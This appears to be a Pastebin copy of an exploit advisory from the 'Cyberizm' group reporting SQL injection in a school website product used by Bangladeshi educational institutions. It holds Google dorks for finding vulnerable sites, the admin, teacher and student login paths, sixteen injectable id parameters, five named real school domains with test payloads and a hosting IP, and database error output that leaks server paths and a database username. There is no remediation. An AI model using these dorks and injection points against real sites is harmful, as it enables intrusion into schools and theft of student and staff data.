Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################################################
- # Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 08/01/2019
- # Vendor Homepage : softitsecurity.com ~ hululuit.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : intext:''© Copyright 2019. Designed and
- Developed by Soft IT Security'' site:edu.bd
- intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Cyberizm Exploit Reference Link :
- cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html
- # CXSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010043
- ###############################################################
- Admin/Teacher/Student Panel Login Path =>
- /adminoperation/
- /teacheroperation/
- /studentoperation/
- # SQL Injection Exploits :
- **********************
- /?v=home.jsp&id=[SQL Injection]
- /?v=administrationdeatils.jsp&id=[SQL Injection]
- /?v=allteacher.jsp&id=[SQL Injection]
- /?v=allclark.jsp&id=[SQL Injection]
- /?v=talentstudent-detail.jsp&id=[SQL Injection]
- /?v=allstudent.jsp&id=[SQL Injection]
- /?v=boardresultdetails.jsp&id=1%27
- /?v=universitydetails.jsp&id=[SQL Injection]
- /?v=talentteacher-detail.jsp&id=[SQL Injection]
- /?v=academiccalender-details.jsp&id=[SQL Injection]
- /?v=allevent.jsp&id=[SQL Injection]
- /?v=allresult.jsp&id=[SQL Injection]
- /?v=noticebord-detail.jsp&id=[SQL Injection]
- /?v=uploadbook-details.jsp&id=[SQL Injection]
- /?v=usefulllinkdetails.jsp&id=[SQL Injection]
- /?v=checkclass.jsp&id=[SQL Injection]
- ###############################################################
- # Example Vulnerable Sites =>
- ***************************
- Note : (192.185.94.62) => There are 182 domains hosted on this server.
- [+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27
- ###############################################################
- # SQL Database Error :
- *********************
- Deprecated: mysql_connect(): The mysql extension is deprecated and
- will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali
- /public_html/DAL/DbConnect.php on line 8
- Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost'
- (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
- Warning: fread(): Length parameter must be greater than 0 in
- /home/haripuralimmadra/public_html/controller/function.php on line 220
- ###############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###############################################################
Add Comment
Please, Sign In to add comment